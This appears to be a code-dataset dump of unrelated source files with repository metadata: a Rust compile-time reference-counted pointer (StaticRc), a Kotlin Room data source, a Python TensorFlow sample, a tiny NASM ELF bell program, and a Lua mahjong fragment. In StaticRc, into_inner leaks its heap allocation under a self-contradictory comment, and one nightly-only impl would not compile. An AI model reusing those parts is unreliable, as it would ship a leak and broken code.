fn build_reactant_map(reactions: &[Reaction]) -> HashMap<Chemical, &Reaction> {
    reactions
        .iter()
        .map(|reaction| (reaction.product.clone(), reaction))
        .collect()
}
/// A chemical reaction
#[derive(Debug)]
struct Reaction {
    // Input chemicals and the quantity of each consumed per run.
    reactants: HashMap<Chemical, u64>,
    // Chemical produced by this reaction.
    product: Chemical,
    // Units of `product` produced per run.
    quantity: u64,
}
impl fmt::Display for Reaction {
    // Renders the rule in input syntax: "N1 CHEM1, N2 CHEM2 => N PRODUCT".
    // Reactant order is unspecified (HashMap iteration order).
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        let inputs = self.reactants.iter().map(|(c, &n)| format!("{} {}", n, c)).collect::<Vec<_>>().join(", ");
        write!(f, "{} => {} {}", inputs, self.quantity, self.product)
    }
}
647f84865144aee13674b2cb43fb862bb0ee7c4f | 17,985 | rs | Rust | src/static_rc.rs | Johannesd3/static-rc | 48e883e2f5d89a3177ef31f4773ab7252b614a9d | [
"Apache-2.0",
"MIT"
] | null | null | null | src/static_rc.rs | Johannesd3/static-rc | 48e883e2f5d89a3177ef31f4773ab7252b614a9d | [
"Apache-2.0",
"MIT"
] | null | null | null | src/static_rc.rs | Johannesd3/static-rc | 48e883e2f5d89a3177ef31f4773ab7252b614a9d | [
"Apache-2.0",
"MIT"
] | null | null | null | // StaticRc
use core::{
any,
borrow,
cmp,
convert,
fmt,
future,
hash,
iter,
marker,
mem,
ops,
pin,
ptr::{self, NonNull},
task,
};
use alloc::boxed::Box;
#[cfg(nightly_async_stream)]
use core::stream;
/// A compile-time reference-counted pointer.
///
/// The inherent methods of `StaticRc` are all associated functions to avoid conflicts with the methods of the
/// inner type `T` which are brought into scope by the `Deref` implementation.
///
/// The parameters `NUM` and `DEN` denote the ratio (`NUM / DEN`) of ownership of the pointer:
///
/// - The ratio is always in the (0, 1] interval, that is: `NUM > 0` and `NUM <= DEN`.
/// - When the ratio is equal to 1, that is when `NUM == DEN`, then the instance has full ownership of the pointee
///   and extra capabilities are unlocked.
pub struct StaticRc<T: ?Sized, const NUM: usize, const DEN: usize> {
    // Always points to a live, Box-allocated `T`; freed only by a full owner.
    pointer: NonNull<T>,
}
impl<T, const N: usize> StaticRc<T, N, N> {
    /// Constructs a new `StaticRc<T, N, N>`.
    ///
    /// This uses `Box` under the hood.
    #[inline(always)]
    pub fn new(value: T) -> Self {
        let pointer = NonNull::from(Box::leak(Box::new(value)));
        Self { pointer }
    }
    /// Constructs a new `Pin<StaticRc<T, N, N>>`.
    #[inline(always)]
    pub fn pin(value: T) -> pin::Pin<Self> {
        // Safety:
        // - The `value` is placed on the heap, and cannot be moved out of the heap without full ownership.
        unsafe { pin::Pin::new_unchecked(Self::new(value)) }
    }
    /// Returns the inner value.
    ///
    /// Only available with full ownership (ratio = 1).
    #[inline(always)]
    pub fn into_inner(this: Self) -> T {
        // Safety:
        // - Ratio = 1, hence full ownership.
        let value = unsafe { ptr::read(this.pointer.as_ptr()) };
        // Forget `this` so Drop doesn't free the (now moved-from) allocation;
        // note the Box's backing memory is intentionally leaked here only in
        // the sense that Drop won't run -- the read moved the value out.
        mem::forget(this);
        value
    }
}
impl<T: ?Sized, const N: usize> StaticRc<T, N, N> {
/// Returns a mutable reference into the given `StaticRc`.
#[inline(always)]
pub fn get_mut(this: &mut Self) -> &mut T {
// Safety:
// - Ratio = 1, hence full ownership.
unsafe { this.pointer.as_mut() }
}
/// Returns the inner value, boxed
#[inline(always)]
pub fn into_box(this: Self) -> Box<T> {
// Safety:
// - Ratio = 1, hence full ownership.
// - `this.pointer` was allocated by Box.
unsafe { Box::from_raw(this.pointer.as_ptr()) }
}
}
impl<T: ?Sized, const NUM: usize, const DEN: usize> StaticRc<T, NUM, DEN> {
    /// Consumes the `StaticRc`, returning the wrapped pointer.
    ///
    /// To avoid a memory leak, the pointer must be converted back to `Self` using `StaticRc::from_raw`.
    #[inline(always)]
    pub fn into_raw(this: Self) -> NonNull<T> {
        let pointer = this.pointer;
        //  BUGFIX: `this` must be forgotten. Letting it drop would run
        //  `Drop for StaticRc`, which at ratio 1 frees the allocation the
        //  returned raw pointer still refers to (use-after-free), and at
        //  partial ratios trips the debug assertion.
        mem::forget(this);
        pointer
    }
    /// Provides a raw pointer to the data.
    ///
    /// `StaticRc` is not consumed or affected in any way, the pointer is valid as long as there are shared owners of
    /// the value.
    #[inline(always)]
    pub fn as_ptr(this: &Self) -> NonNull<T> { this.pointer }
    /// Provides a reference to the data.
    #[inline(always)]
    pub fn get_ref(this: &Self) -> &T {
        // Safety:
        // - The data is valid for as long as `this` lives.
        unsafe { this.pointer.as_ref() }
    }
    /// Constructs a `StaticRc<T, NUM, DEN>` from a raw pointer.
    ///
    /// The raw pointer must have been previously returned by a call to `StaticRc<U, N, D>::into_raw`:
    ///
    /// - If `U` is different from `T`, then specific restrictions on size and alignment apply. See `mem::transmute`
    ///   for the restrictions applying to transmuting references.
    /// - If `N / D` is different from `NUM / DEN`, then specific restrictions apply. The user is responsible for
    ///   ensuring proper management of the ratio of shares, and ultimately that the value is not dropped twice.
    #[inline(always)]
    pub unsafe fn from_raw(pointer: NonNull<T>) -> Self { Self { pointer } }
    /// Returns true if the two `StaticRc` point to the same allocation.
    #[inline(always)]
    pub fn ptr_eq<const N: usize, const D: usize>(this: &Self, other: &StaticRc<T, N, D>) -> bool {
        StaticRc::as_ptr(this) == StaticRc::as_ptr(other)
    }
    /// Adjusts the NUMerator and DENUMerator of the ratio of the instance, preserving the ratio.
    #[inline(always)]
    pub fn adjust<const N: usize, const D: usize>(this: Self) -> StaticRc<T, N, D> {
        // Check that NUM / DEN == N / D <=> NUM * D == N * DEN
        #[cfg(compile_time_ratio)]
        {
            let _ : [u8; NUM * D - N * DEN];
            let _ : [u8; N * DEN - NUM * D];
        }
        #[cfg(not(compile_time_ratio))]
        assert_eq!(NUM * D, N * DEN, "{} / {} != {} / {}", NUM, DEN, N, D);
        let pointer = this.pointer;
        mem::forget(this);
        StaticRc { pointer }
    }
    /// Splits the current instance into two instances with the specified NUMerators.
    #[inline(always)]
    pub fn split<const A: usize, const B: usize>(this: Self) -> (StaticRc<T, A, DEN>, StaticRc<T, B, DEN>) {
        // Check that (A + B) == NUM.
        #[cfg(compile_time_ratio)]
        {
            let _ : [u8; (A + B) - NUM];
            let _ : [u8; NUM - (A + B)];
        }
        #[cfg(not(compile_time_ratio))]
        assert_eq!(NUM, A + B, "{} != {} + {}", NUM, A, B);
        let pointer = this.pointer;
        mem::forget(this);
        (StaticRc { pointer }, StaticRc { pointer })
    }
    /// Joins two instances into a single instance.
    ///
    /// # Panics
    ///
    /// If the two instances do no point to the same allocation, as determined by `StaticRc::ptr_eq`.
    #[inline(always)]
    pub fn join<const A: usize, const B: usize>(left: StaticRc<T, A, DEN>, right: StaticRc<T, B, DEN>) -> Self {
        // Check that (A + B) == NUM.
        #[cfg(compile_time_ratio)]
        {
            let _ : [u8; (A + B) - NUM];
            let _ : [u8; NUM - (A + B)];
        }
        #[cfg(not(compile_time_ratio))]
        assert_eq!(NUM, A + B, "{} != {} + {}", NUM, A, B);
        assert!(StaticRc::ptr_eq(&left, &right), "{:?} != {:?}", left.pointer.as_ptr(), right.pointer.as_ptr());
        let pointer = left.pointer;
        mem::forget(left);
        mem::forget(right);
        Self { pointer }
    }
}
impl<const NUM: usize, const DEN: usize> StaticRc<dyn any::Any, NUM, DEN> {
    /// Attempts to downcast `Self` to a concrete type.
    ///
    /// On failure the original instance is returned unchanged in `Err`.
    pub fn downcast<T: any::Any>(self) -> Result<StaticRc<T, NUM, DEN>, Self> {
        if Self::get_ref(&self).is::<T>() {
            // into_raw relinquishes ownership without dropping, so the cast
            // pointer can safely be rewrapped at the same ratio.
            let pointer = Self::into_raw(self).cast::<T>();
            Ok(StaticRc { pointer })
        } else {
            Err(self)
        }
    }
}
impl<T: ?Sized, const NUM: usize, const DEN: usize> Drop for StaticRc<T, NUM, DEN> {
    // Only a full owner (NUM == DEN) frees the allocation; dropping a
    // partial share is a bug -- it asserts in debug builds and leaks in
    // release builds (shares are meant to be join()ed back first).
    #[inline(always)]
    fn drop(&mut self) {
        // Check that NUM == DEN.
        #[cfg(compile_time_ratio)]
        {
            let _ : [u8; DEN - NUM];
            let _ : [u8; NUM - DEN];
        }
        #[cfg(not(compile_time_ratio))]
        debug_assert_eq!(NUM, DEN, "{} != {}", NUM, DEN);
        if NUM == DEN {
            // Safety:
            // - Ratio = 1, hence full ownership.
            // - `self.pointer` was allocated by Box.
            unsafe { Box::from_raw(self.pointer.as_ptr()) };
        }
    }
}
// Mutable access traits are only implemented at ratio 1 (N, N): exclusivity
// is what makes handing out `&mut T` sound.
impl<T: ?Sized, const N: usize> convert::AsMut<T> for StaticRc<T, N, N> {
    #[inline(always)]
    fn as_mut(&mut self) -> &mut T { Self::get_mut(self) }
}
impl<T: ?Sized, const NUM: usize, const DEN: usize> convert::AsRef<T> for StaticRc<T, NUM, DEN> {
    #[inline(always)]
    fn as_ref(&self) -> &T { Self::get_ref(self) }
}
impl<T: ?Sized, const NUM: usize, const DEN: usize> borrow::Borrow<T> for StaticRc<T, NUM, DEN> {
    #[inline(always)]
    fn borrow(&self) -> &T { Self::get_ref(self) }
}
impl<T: ?Sized, const N: usize> borrow::BorrowMut<T> for StaticRc<T, N, N> {
    #[inline(always)]
    fn borrow_mut(&mut self) -> &mut T { Self::get_mut(self) }
}
// Unsizing coercions (e.g. StaticRc<[T; 3], ..> -> StaticRc<[T], ..>);
// nightly-only feature gate.
#[cfg(nightly_coerce_unsized)]
impl<T, U, const NUM: usize, const DEN: usize> CoerceUnsized<StaticRc<U, NUM, DEN>> for StaticRc<T, NUM, DEN>
where
    T: ?Sized + marker::Unsize<U>,
    U: ?Sized,
{}
impl<T: ?Sized + fmt::Debug, const NUM: usize, const DEN: usize> fmt::Debug for StaticRc<T, NUM, DEN> {
    #[inline(always)]
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> Result<(), fmt::Error> {
        fmt::Debug::fmt(Self::get_ref(self), f)
    }
}
impl<T: Default, const N: usize> Default for StaticRc<T, N, N> {
    #[inline(always)]
    fn default() -> Self { Self::new(T::default()) }
}
impl<T: ?Sized, const NUM: usize, const DEN: usize> ops::Deref for StaticRc<T, NUM, DEN> {
    type Target = T;
    #[inline(always)]
    fn deref(&self) -> &T { Self::get_ref(self) }
}
impl<T: ?Sized, const N: usize> ops::DerefMut for StaticRc<T, N, N> {
    #[inline(always)]
    fn deref_mut(&mut self) -> &mut T { Self::get_mut(self) }
}
impl<T: ?Sized + fmt::Display, const NUM: usize, const DEN: usize> fmt::Display for StaticRc<T, NUM, DEN> {
    #[inline(always)]
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> Result<(), fmt::Error> {
        fmt::Display::fmt(Self::get_ref(self), f)
    }
}
#[cfg(nightly_dispatch_from_dyn)]
impl<T, U, const NUM: usize, const DEN: usize> DispatchFromDyn<StaticRc<U, NUM, DEN>> for StaticRc<T, NUM, DEN>
where
    T: ?Sized + marker::Unsize<U>,
    U: ?Sized,
{}
// Iterator adaptors delegate to the pointee; they need `&mut`, hence ratio 1.
impl<I: iter::DoubleEndedIterator + ?Sized, const N: usize> iter::DoubleEndedIterator for StaticRc<I, N, N> {
    #[inline(always)]
    fn next_back(&mut self) -> Option<I::Item> { Self::get_mut(self).next_back() }
    #[inline(always)]
    fn nth_back(&mut self, n: usize) -> Option<I::Item> { Self::get_mut(self).nth_back(n) }
}
impl<T: ?Sized + cmp::Eq, const NUM: usize, const DEN: usize> cmp::Eq for StaticRc<T, NUM, DEN> {}
impl<I: iter::ExactSizeIterator + ?Sized, const N: usize> iter::ExactSizeIterator for StaticRc<I, N, N> {
    #[inline(always)]
    fn len(&self) -> usize { Self::get_ref(self).len() }
}
// Conversions in and out of Box (and the standard owning containers).
// All conversions that *consume* full ownership go through
// StaticRc::into_box, which transfers the allocation without dropping.
impl<T: ?Sized, const N: usize> From<Box<T>> for StaticRc<T, N, N> {
    #[inline(always)]
    fn from(value: Box<T>) -> Self {
        let pointer = NonNull::from(Box::leak(value));
        Self { pointer }
    }
}
impl<T: Copy, const N: usize> From<&'_ [T]> for StaticRc<[T], N, N> {
    #[inline(always)]
    fn from(value: &[T]) -> Self { Self::from(Box::from(value)) }
}
impl<const N: usize> From<&'_ str> for StaticRc<str, N, N> {
    #[inline(always)]
    fn from(value: &str) -> Self { Self::from(Box::from(value)) }
}
impl<T, const LEN: usize, const N: usize> From<[T; LEN]> for StaticRc<[T], N, N> {
    #[inline(always)]
    fn from(value: [T; LEN]) -> Self { Self::from(Box::from(value)) }
}
impl<T: Copy, const N: usize> From<alloc::borrow::Cow<'_, [T]>> for StaticRc<[T], N, N> {
    #[inline(always)]
    fn from(value: alloc::borrow::Cow<'_, [T]>) -> Self { Self::from(Box::from(value)) }
}
impl<const N: usize> From<alloc::borrow::Cow<'_, str>> for StaticRc<str, N, N> {
    #[inline(always)]
    fn from(value: alloc::borrow::Cow<'_, str>) -> Self { Self::from(Box::from(value)) }
}
impl<const N: usize> From<alloc::string::String> for StaticRc<str, N, N> {
    #[inline(always)]
    fn from(value: alloc::string::String) -> Self { Self::from(Box::from(value)) }
}
impl<T, const N: usize> From<T> for StaticRc<T, N, N> {
    #[inline(always)]
    fn from(value: T) -> Self { Self::from(Box::from(value)) }
}
impl<T, const N: usize> From<alloc::vec::Vec<T>> for StaticRc<[T], N, N> {
    #[inline(always)]
    fn from(value: alloc::vec::Vec<T>) -> Self { Self::from(Box::from(value)) }
}
impl<T, const N: usize> From<StaticRc<[T], N, N>> for alloc::vec::Vec<T> {
    #[inline(always)]
    fn from(value: StaticRc<[T], N, N>) -> Self { Self::from(StaticRc::into_box(value)) }
}
impl<T: ?Sized, const N: usize> From<StaticRc<T, N, N>> for alloc::rc::Rc<T> {
    #[inline(always)]
    fn from(value: StaticRc<T, N, N>) -> Self { Self::from(StaticRc::into_box(value)) }
}
impl<T: ?Sized, const N: usize> From<StaticRc<T, N, N>> for alloc::sync::Arc<T> {
    #[inline(always)]
    fn from(value: StaticRc<T, N, N>) -> Self { Self::from(StaticRc::into_box(value)) }
}
impl<const N: usize> From<StaticRc<str, N, N>> for alloc::string::String {
    #[inline(always)]
    fn from(value: StaticRc<str, N, N>) -> Self { Self::from(StaticRc::into_box(value)) }
}
// Ratio-preserving reinterpretation of str shares as byte-slice shares;
// `str` and `[u8]` have identical layout.
impl<const NUM: usize, const DEN: usize> From<StaticRc<str, NUM, DEN>> for StaticRc<[u8], NUM, DEN> {
    #[inline(always)]
    fn from(value: StaticRc<str, NUM, DEN>) -> Self {
        let pointer = value.pointer.as_ptr() as *mut [u8];
        // Forget the source share so Drop doesn't run; the new share takes
        // over exactly the same ownership fraction.
        mem::forget(value);
        // Safety:
        // - `value.pointer` was not null, hence `pointer` is not null.
        debug_assert!(!pointer.is_null());
        let pointer = unsafe { NonNull::new_unchecked(pointer) };
        Self { pointer }
    }
}
impl<const N: usize> iter::FromIterator<StaticRc<str, N, N>> for alloc::string::String {
    #[inline(always)]
    fn from_iter<I: IntoIterator<Item = StaticRc<str, N, N>>>(iter: I) -> Self {
        Self::from_iter(iter.into_iter().map(StaticRc::into_box))
    }
}
impl<T, const N: usize> iter::FromIterator<T> for StaticRc<[T], N, N> {
    #[inline(always)]
    fn from_iter<I: IntoIterator<Item = T>>(iter: I) -> Self { Self::from(Box::from_iter(iter)) }
}
impl<I: iter::FusedIterator + ?Sized, const N: usize> iter::FusedIterator for StaticRc<I, N, N> {}
impl<F: ?Sized + future::Future + marker::Unpin, const N: usize> future::Future for StaticRc<F, N, N> {
type Output = F::Output;
fn poll(mut self: pin::Pin<&mut Self>, cx: &mut task::Context<'_>) -> task::Poll<Self::Output> {
F::poll(pin::Pin::new(&mut *self), cx)
}
}
#[cfg(nightly_generator_trait)]
impl<G: ?Sized + ops::Generator<R> + marker::Unpin, R, const N: usize> ops::Generator<R> for StaticRc<G, N, N> {
type Yield = G::Yield;
type Return = G::Return;
fn resume(mut self: pin::Pin<&mut Self>, arg: R) -> ops::GeneratorState<Self::Yield, Self::Return> {
G::resume(pin::Pin(&mut *self), arg)
}
}
#[cfg(nightly_generator_trait)]
impl<G: ?Sized + ops::Generator<R>, R, const N: usize> ops::Generator<R> for pin::Pin<StaticRc<G, N, N>> {
type Yield = G::Yield;
type Return = G::Return;
fn resume(mut self: pin::Pin<&mut Self>, arg: R) -> ops::GeneratorState<Self::Yield, Self::Return> {
G::resume((*self).as_mut(), arg)
}
}
impl<T: ?Sized + hash::Hash, const NUM: usize, const DEN: usize> hash::Hash for StaticRc<T, NUM, DEN> {
#[inline(always)]
fn hash<H: hash::Hasher>(&self, state: &mut H) {
Self::get_ref(self).hash(state);
}
}
impl<I: iter::Iterator + ?Sized, const N: usize> iter::Iterator for StaticRc<I, N, N> {
type Item = I::Item;
#[inline(always)]
fn next(&mut self) -> Option<I::Item> { Self::get_mut(self).next() }
#[inline(always)]
fn size_hint(&self) -> (usize, Option<usize>) { Self::get_ref(self).size_hint() }
#[inline(always)]
fn nth(&mut self, n: usize) -> Option<I::Item> { Self::get_mut(self).nth(n) }
#[inline(always)]
fn last(self) -> Option<I::Item> { Self::into_box(self).last() }
}
impl<T: ?Sized + cmp::Ord, const NUM: usize, const DEN: usize> cmp::Ord for StaticRc<T, NUM, DEN> {
#[inline(always)]
fn cmp(&self, other: &Self) -> cmp::Ordering {
if Self::ptr_eq(self, other) {
cmp::Ordering::Equal
} else {
Self::get_ref(self).cmp(Self::get_ref(other))
}
}
}
impl<T, const NUM: usize, const DEN: usize, const N: usize, const D: usize> cmp::PartialEq<StaticRc<T, N, D>>
for StaticRc<T, NUM, DEN>
where
T: ?Sized + PartialEq<T>
{
#[inline(always)]
fn eq(&self, other: &StaticRc<T, N, D>) -> bool { Self::get_ref(self).eq(StaticRc::get_ref(other)) }
#[inline(always)]
fn ne(&self, other: &StaticRc<T, N, D>) -> bool { Self::get_ref(self).ne(StaticRc::get_ref(other)) }
}
impl<T, const NUM: usize, const DEN: usize, const N: usize, const D: usize> cmp::PartialOrd<StaticRc<T, N, D>>
for StaticRc<T, NUM, DEN>
where
T: ?Sized + PartialOrd<T>
{
#[inline(always)]
fn partial_cmp(&self, other: &StaticRc<T, N, D>) -> Option<cmp::Ordering> {
Self::get_ref(self).partial_cmp(StaticRc::get_ref(other))
}
#[inline(always)]
fn lt(&self, other: &StaticRc<T, N, D>) -> bool {
Self::get_ref(self).lt(StaticRc::get_ref(other))
}
#[inline(always)]
fn le(&self, other: &StaticRc<T, N, D>) -> bool {
Self::get_ref(self).le(StaticRc::get_ref(other))
}
#[inline(always)]
fn gt(&self, other: &StaticRc<T, N, D>) -> bool {
Self::get_ref(self).gt(StaticRc::get_ref(other))
}
#[inline(always)]
fn ge(&self, other: &StaticRc<T, N, D>) -> bool {
Self::get_ref(self).ge(StaticRc::get_ref(other))
}
}
impl<T: ?Sized, const NUM: usize, const DEN: usize> fmt::Pointer for StaticRc<T, NUM, DEN> {
#[inline(always)]
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
fmt::Pointer::fmt(&Self::as_ptr(self).as_ptr(), f)
}
}
#[cfg(nightly_async_stream)]
impl<S: ?Sized + stream::Stream + marker::Unpin, const N: usize> stream::Stream for StaticRc<S, N, N> {
type Item = S::Item;
fn poll_next(mut self: pin::Pin<&mut Self>, cx: &mut task::Context<'_>) -> task::Poll<Option<Self::Item>> {
pin::Pin::new(&mut **self).poll_next(cx)
}
fn size_hint(&self) -> (usize, Option<usize>) { (**self).size_hint() }
}
impl<T: ?Sized, const NUM: usize, const DEN: usize> marker::Unpin for StaticRc<T, NUM, DEN> {}
unsafe impl<T: ?Sized + marker::Send, const NUM: usize, const DEN: usize> marker::Send for StaticRc<T, NUM, DEN> {}
unsafe impl<T: ?Sized + marker::Sync, const NUM: usize, const DEN: usize> marker::Sync for StaticRc<T, NUM, DEN> {}
| 34.127135 | 118 | 0.583097 | 3.375 |
90094aaa82be4c9b440fe850997c833182e8e5b8 | 1,575 | kt | Kotlin | app/src/main/java/tech/takenoko/cleanarchitecturex/repository/local/UserLocalDataSource.kt | TakenokoTech/CleanArchitectureX | 3fe34a5d239c7baece4de3a8416c9fd80fe129a2 | [
"MIT"
] | 3 | 2020-09-02T12:42:28.000Z | 2020-11-27T07:22:01.000Z | app/src/main/java/tech/takenoko/cleanarchitecturex/repository/local/UserLocalDataSource.kt | TakenokoTech/CleanArchitectureX | 3fe34a5d239c7baece4de3a8416c9fd80fe129a2 | [
"MIT"
] | 12 | 2019-11-28T05:56:50.000Z | 2019-12-09T16:55:35.000Z | app/src/main/java/tech/takenoko/cleanarchitecturex/repository/local/UserLocalDataSource.kt | TakenokoTech/CleanArchitectureX | 3fe34a5d239c7baece4de3a8416c9fd80fe129a2 | [
"MIT"
] | null | null | null | package tech.takenoko.cleanarchitecturex.repository.local
import androidx.annotation.MainThread
import androidx.annotation.WorkerThread
import androidx.lifecycle.LiveData
import androidx.room.ColumnInfo
import androidx.room.Entity
import androidx.room.PrimaryKey
import org.koin.core.KoinComponent
import org.koin.core.inject
import tech.takenoko.cleanarchitecturex.di.AppDatabase
import tech.takenoko.cleanarchitecturex.entities.room.UserDao
import tech.takenoko.cleanarchitecturex.utils.AppLog
class UserLocalDataSource : UserDao, KoinComponent {
private val database: AppDatabase by inject()
@WorkerThread
override suspend fun getAll(): List<User> {
return database.userDao().getAll()
}
@WorkerThread
override suspend fun insertAll(vararg users: User) {
val result = database.userDao().insertAll(*users)
AppLog.debug(TAG, "insertAll. ${users.map { it.id }}")
return result
}
@WorkerThread
override suspend fun deleteAll() {
val result = database.userDao().deleteAll()
AppLog.debug(TAG, "deleteAll.")
return result
}
@MainThread
override fun getAllToLive(): LiveData<List<User>> {
return database.userDao().getAllToLive()
}
@Entity
data class User(
@ColumnInfo(name = "userName") val userName: String,
@ColumnInfo(name = "displayName") val displayName: String,
@PrimaryKey(autoGenerate = true) val id: Int = 0
)
companion object {
private val TAG = UserLocalDataSource::class.java.simpleName
}
}
| 29.166667 | 68 | 0.711746 | 3.09375 |
f065f569bc87da0b1005e3822cbd92500b510024 | 1,713 | py | Python | netensorflow/api_samples/ann_creation_and_usage.py | psigelo/NeTensorflow | ec8bc09cc98346484d1b682a3dfd25c68c4ded61 | [
"MIT"
] | null | null | null | netensorflow/api_samples/ann_creation_and_usage.py | psigelo/NeTensorflow | ec8bc09cc98346484d1b682a3dfd25c68c4ded61 | [
"MIT"
] | null | null | null | netensorflow/api_samples/ann_creation_and_usage.py | psigelo/NeTensorflow | ec8bc09cc98346484d1b682a3dfd25c68c4ded61 | [
"MIT"
] | null | null | null | import tensorflow as tf
from netensorflow.ann.ANN import ANN
from netensorflow.ann.macro_layer.MacroLayer import MacroLayer
from netensorflow.ann.macro_layer.layer_structure.InputLayerStructure import InputLayerStructure
from netensorflow.ann.macro_layer.layer_structure.LayerStructure import LayerStructure, LayerType
from netensorflow.ann.macro_layer.layer_structure.layers.FullConnected import FullConnected
from netensorflow.ann.macro_layer.layer_structure.layers.FullConnectedWithSoftmaxLayer import FullConnectedWithSoftmaxLayer
'''
ann Creation and simple usage, the goal of this code is simply run the most simpler artificial neural network
'''
def main():
# tensorflow
tf_sess = tf.Session()
# Layers:
input_dim = [None, 3]
hidden_layer = FullConnected(inputs_amount=20)
out_layer = FullConnectedWithSoftmaxLayer(inputs_amount=10)
# Layer Structures
input_layer_structure = InputLayerStructure(input_dim)
hidden_layer_structure = LayerStructure('Hidden', layer_type=LayerType.ONE_DIMENSION, layers=[hidden_layer])
output_layer_structure = LayerStructure('Output', layer_type=LayerType.ONE_DIMENSION,layers=[out_layer])
# Macro Layer
macro_layers = MacroLayer(layers_structure=[input_layer_structure, hidden_layer_structure, output_layer_structure])
# ann
ann = ANN(macro_layers=macro_layers, tf_session=tf_sess, base_folder='./tensorboard_logs/')
ann.connect_and_initialize()
# Execute
for it in range(100):
import numpy as np
input_tensor_value = [np.random.uniform(0.0, 10.0, 3)]
print(ann.run(global_iteration=it, input_tensor_value=input_tensor_value))
if __name__ == '__main__':
main()
| 37.23913 | 123 | 0.782837 | 3.140625 |
2d99d9c46e04f30f5d758fc9de892ba87ed74e95 | 2,716 | asm | Assembly | src/test/resources/elfsamples/tiny/keepalive.asm | thingswars/johnnyriscv | 7310af27952cf9e121a2237a9478ff6c06599a8d | [
"Apache-2.0"
] | 3 | 2016-07-15T20:35:12.000Z | 2018-08-07T18:55:33.000Z | src/test/resources/elfsamples/tiny/keepalive.asm | thingswars/johnnyriscv | 7310af27952cf9e121a2237a9478ff6c06599a8d | [
"Apache-2.0"
] | null | null | null | src/test/resources/elfsamples/tiny/keepalive.asm | thingswars/johnnyriscv | 7310af27952cf9e121a2237a9478ff6c06599a8d | [
"Apache-2.0"
] | null | null | null | ;; keepalive.asm: Copyright (C) 2001 Brian Raiter <[email protected]>
;; Licensed under the terms of the GNU General Public License, either
;; version 2 or (at your option) any later version.
;;
;; To build:
;; nasm -f bin -o keepalive keepalive.asm && chmod +x keepalive
BITS 32
org 0x05426000
db 0x7F, "ELF"
dd 1
dd 0
dd $$
dw 2
dw 3
dd _start
db _start - $$
_start: pusha ; Save the current state
inc edx ; Set output length to one byte
add eax, dword 4 ; write system call number
mov ecx, esp ; Point ecx at a buffer
push ecx ; Save buffer pointer
mov [ecx], word 0x0107 ; 263 seconds, or an ASCII BEL
inc ebx ; stdout file descriptor
cmp eax, 0x00010020
int 0x80 ; 1. Lather the bell
pop ebx ; Point ebx at timespec
mov al, 162 ; nanosleep system call number
int 0x80 ; 2. Rinse for 263 seconds
popa ; Restore the saved state
jmp short _start ; 3. Repeat
;; This is how the file looks when it is read as an ELF header,
;; beginning at offset 0:
;;
;; e_ident: db 0x7F, "ELF" ; required
;; db 1 ; 1 = ELFCLASS32
;; db 0 ; (garbage)
;; db 0 ; (garbage)
;; db 0 ; (garbage)
;; db 0x00, 0x00, 0x00, 0x00 ; (unused)
;; db 0x00, 0x60, 0x42, 0x05
;; e_type: dw 2 ; 2 = ET_EXE
;; e_machine: dw 3 ; 3 = EM_386
;; e_version: dd 0x05426019 ; (garbage)
;; e_entry: dd 0x05426019 ; program starts here
;; e_phoff: dd 4 ; phdrs located here
;; e_shoff: dd 0x6651E189 ; (garbage)
;; e_flags: dd 0x000701C7 ; (unused)
;; e_ehsize: dw 0x3D43 ; (garbage)
;; e_phentsize: dw 0x20 ; phdr entry size
;; e_phnum: db 1 ; one phdr in the table
;; e_shentsize: db 0x80CD ; (garbage)
;; e_shnum: db 0xB05B ; (garbage)
;; e_shstrndx: db 0xCDA2 ; (garbage)
;;
;; This is how the file looks when it is read as a program header
;; table, beginning at offset 4:
;;
;; p_type: dd 1 ; 1 = PT_LOAD
;; p_offset: dd 0 ; read from top of file
;; p_vaddr: dd 0x05426000 ; load at this address
;; p_paddr: dd 0x00030002 ; (unused)
;; p_filesz: dd 0x05426019 ; too big, but ok
;; p_memsz: dd 0x05426019 ; equal to file size
;; p_flags: dd 4 ; 4 = PF_R
;; p_align: dd 0x6651E189 ; (garbage)
;;
;; Note that the top three bytes of the file's origin (0x60 0x42 0x05)
;; correspond to the instructions "pusha", "inc edx", and the first
;; byte of "add eax, IMM".
;;
;; The fields marked as unused are either specifically documented as
;; not being used, or not being used with 386-based implementations.
;; Some of the fields marked as containing garbage are not used when
;; loading and executing programs. Other fields containing garbage are
;; accepted because Linux currently doesn't examine then.
| 33.95 | 75 | 0.663476 | 3 |
4d888bd8eaeb4e694ab623be7221fc8438aa8e03 | 6,215 | lua | Lua | game/helpers/mahjong/logic.lua | lualcs/xsServer | dc774f9f4364b5a24924c9ce5293d7cf5265c2d4 | [
"MIT"
] | 1 | 2021-02-08T12:27:24.000Z | 2021-02-08T12:27:24.000Z | game/helpers/mahjong/logic.lua | lualcs/xsServer | dc774f9f4364b5a24924c9ce5293d7cf5265c2d4 | [
"MIT"
] | null | null | null | game/helpers/mahjong/logic.lua | lualcs/xsServer | dc774f9f4364b5a24924c9ce5293d7cf5265c2d4 | [
"MIT"
] | 1 | 2022-01-23T05:14:55.000Z | 2022-01-23T05:14:55.000Z | --[[
file:mahjongLogic.lua
desc:麻将扑克
auth:Carol Luo
]]
local ipairs = ipairs
local math = require("extend_math")
local table = require("extend_table")
local class = require("class")
local gameLogic = require("game.logic")
---@class mahjongLogic:gameLogic @麻将扑克
local logic = class(gameLogic)
local this = logic
local senum = require("mahjong.enum")
---构造函数
---@param table mahjongCompetition
function logic:ctor(table)
self._competition = table
end
---数据获取
------@param senum senum @索引
---@return table<senum,any>
function logic:getDriver(senum)
return self._competition:getDriver(senum)
end
---数据设置
------@param senum senum @索引
------@param data any @数据
function logic:setDriver(senum,data)
return self._competition:setDriver(senum,data)
end
---最大玩家
---@return mjCount
function logic:maxPlayer()
return self._competition:getMaxPlayer()
end
---保存数据
---@param senum senum @映射值
---@param data any @数据值
function logic:setData(senum,data)
self._competition:setData(senum,data)
end
---获取数据
---@return any
function logic:getData(senum)
return self._competition:getData(senum)
end
---玩家数组
---@return mahjongPlayer[]
function logic:arrPlayer()
return self._competition:getArrPlayer()
end
---剩余牌库
----@return mjCard[]
function logic:paiKu()
return self:getDriver(senum.paiKu())
end
---包含牌库
----@return mjCard[]
function logic:baoHan()
return self:getDriver(senum.baoHan())
end
---庄家玩家
---@return mahjongPlayer
function logic:zhuang()
return self:getDriver(senum.zhuang())
end
---构建牌库
---@param builds mjFill[]
function logic:gameSystemCards(builds)
local lis = {}
local map = {}
self:setDriver(senum.paiKu(),lis)
self:setDriver(senum.baoHan(),map)
---游戏辅助
---@type mahjongHelper
local help = self._hlp
